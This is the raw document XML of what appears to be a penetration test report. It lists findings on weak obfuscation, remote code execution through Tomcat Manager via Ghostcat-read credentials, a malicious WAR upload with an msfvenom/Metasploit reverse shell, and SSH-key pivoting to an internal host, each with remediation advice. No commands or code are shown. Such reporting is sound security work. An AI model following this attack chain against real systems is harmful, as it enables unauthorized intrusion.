      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="573F8DCA"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56DFAE9" w14:textId="39C309F9" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps to Reproduce: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="6F0913C0"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253419E" w14:textId="4A47A649" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Directory fuzzing exposed a publicly accessible file containing an obfuscated string, which (after decoding) revealed sensitive information, including an active CVE reference.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="3A3FC813"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F04E7DC" w14:textId="77777777" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="50412E78"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BEB62FC" w14:textId="475516F3" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">         Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA9" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:noProof/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure A.9 </w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>Weak obfuscation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="7E0EE79D" w14:textId="77777777" w:rsidTr="007B6EB7">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FA09206" w14:textId="3E3CBB7C" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="3AB2E424" w14:textId="77777777" w:rsidTr="00760AE4">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846AEF6" w14:textId="14453631" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/649.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>https://owasp.org/Top10/A02_2021-Cryptographic_Failures/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1531" w:tblpY="-726"/>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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="0C565D0D" w14:textId="77777777" w:rsidTr="00CD5DDB">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21CF7AC" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Remote Code Execution via Tomcat Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="007A10E4" w14:textId="77777777" w:rsidTr="00CD5DDB">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83C6DD9"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14F0B86"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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="1DB81C43"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5E69C05" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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VUL_10</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AFC5790"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78048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18E6C2FD" wp14:editId="67D31A15">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>987425</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>53975</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="12065" t="6985" r="9525" b="8255"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1629936142"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52CCC4B" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:77.75pt;margin-top:4.25pt;width:125.8pt;height:10.0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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="5A14C511"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B20EDDD"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6.0</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952019C" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="77706E54" w14:textId="77777777" w:rsidTr="00CD5DDB">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9D8FFB4" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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/AC:H/</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4D69720" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-434: Unrestricted Upload of File with Dangerous Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="193A2BC5"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F458633"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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="1531798E"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7ADE4DA"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Browser, msfvenom, Metasploit framework (exploit multi/handler)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="76659E7C" w14:textId="77777777" w:rsidTr="00CD5DDB">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61107D1" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="02BDBC58" w14:textId="77777777" w:rsidTr="00CD5DDB">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37DF8C7" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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Uploading a malicious WAR file allows execution of arbitrary code, demonstrated by a reverse shell connecting back to the tester’s host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="4963A0F1"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3EF2B79" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="4E861660"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E22222F" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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 xml:space="preserve">10.0.2.178 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="1176EDC1"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9154EA6"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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="52C8A741"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A8BC87A" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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Exposed credentials allow unauthorized Tomcat Manager access. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F96AF1B" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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Arbitrary WAR uploads enable remote code execution Represents a severe breach of confidentiality, integrity, and availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="073FFD14"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6C5399C"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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="6E7CD382"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CDC8EDB" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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Immediately rotate all Tomcat Manager credentials across all environments.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74612FF0" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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Remove plaintext credentials from all application directories.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F78F5DC" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Disable the Tomcat Manager interface if not required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="1AAD21E3"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5CB1338" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="51313E96"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EF9D36F" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Using Ghostcat to read keys.txt allowed retrieval of Tomcat Manager credentials, which were used to deploy a malicious WAR file and obtain a reverse shell running with the privileges of the local user redlowo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="13636EB5"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93AE4AB" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="1618233F"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89ACF85" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA10" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.10 Remote Code Execution via Tomcat Manager</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="031492CA" w14:textId="77777777" w:rsidTr="00CD5DDB">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70CDA04" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">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CD5DDB" w:rsidRPr="00D77DFE" w14:paraId="631788C4" w14:textId="77777777" w:rsidTr="00CD5DDB">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74FFFDC" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, h</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ttps://cwe.mitre.org/data/definitions/434.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1808AAD7" w14:textId="77777777" w:rsidR="00CD5DDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00CD5DDB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0409F4FB" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382DD8AD" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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9B187B" w:rsidRPr="00D77DFE" w14:paraId="2CC24891" w14:textId="77777777" w:rsidTr="007B6EB7">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9EF4F4E" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B" w:rsidP="00CD5DDB">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
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pivoting via Exposed SSH Private Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B187B" w:rsidRPr="00D77DFE" w14:paraId="732A344C" w14:textId="77777777" w:rsidTr="007B6EB7">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466A55D" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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0E2AD96" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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9B187B" w:rsidRPr="00D77DFE" w14:paraId="153588FE"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5253B86" w14:textId="12DA5657" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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VUL_11</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0695D84" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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65760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FB9670D" wp14:editId="447F1CA4">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1074258</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>34925</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="150989579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02E0F00" id="Rectangle: Rounded Corners 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:84.6pt;margin-top:2.75pt;width:125.8pt;height:10.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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B187B" w:rsidRPr="00D77DFE" w14:paraId="12A6FF10"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1D52B73" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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6.0</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9F0B6F1" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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9B187B" w:rsidRPr="00D77DFE" w14:paraId="36BD6A21" w14:textId="77777777" w:rsidTr="007B6EB7">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B93D58A" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B"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/AC:H/</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/S:C/</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MPR:Lv</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173E8F8" w14:textId="77777777" w:rsidR="009B187B" w:rsidRPr="00D77DFE" w:rsidRDefault="009B187B" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-522: Insufficiently Protected Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w14:paraId="7CAE5076"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B9D4D61" w14:textId="769554F2" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46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BB46B0" w:rsidRPr="00D77DFE" w14:paraId="63856FD8"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EAF3B5F" w14:textId="569393AE" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00AF346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Find, SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w14:paraId="691D8AB8" w14:textId="77777777" w:rsidTr="007B6EB7">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2CEF86F" w14:textId="217F60B8" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46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BB46B0" w:rsidRPr="00D77DFE" w14:paraId="4BE4875B" w14:textId="77777777" w:rsidTr="00760AE4">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245D40C" w14:textId="72A79155" w:rsidR="00BB46B0" w:rsidRPr="00D77DFE" w:rsidRDefault="00BB46B0" w:rsidP="00BB46B0">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An arbitrary file upload on 10.0.3.190 enabled a reverse shell, revealing a private SSH key that allowed access to internal host 10.0.4.141, demonstrating critical network pivoting and exposure of sensitive systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
